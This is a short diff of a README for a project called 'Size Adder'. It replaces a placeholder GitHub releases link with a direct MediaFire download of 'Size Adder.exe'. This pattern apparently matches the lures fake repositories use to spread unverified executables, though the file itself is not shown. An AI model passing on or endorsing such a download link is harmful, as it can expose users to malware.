DuskAfterDark/Size_Adder/README.md

 ## Download Now

-You can download the latest version from the [releases page](https://github.com/your-repo/sizer-adder/releases).
+You can download the latest version from the [MediaFire link](https://www.mediafire.com/file/mqflc0otk66s4d5/Size+Adder.exe/file).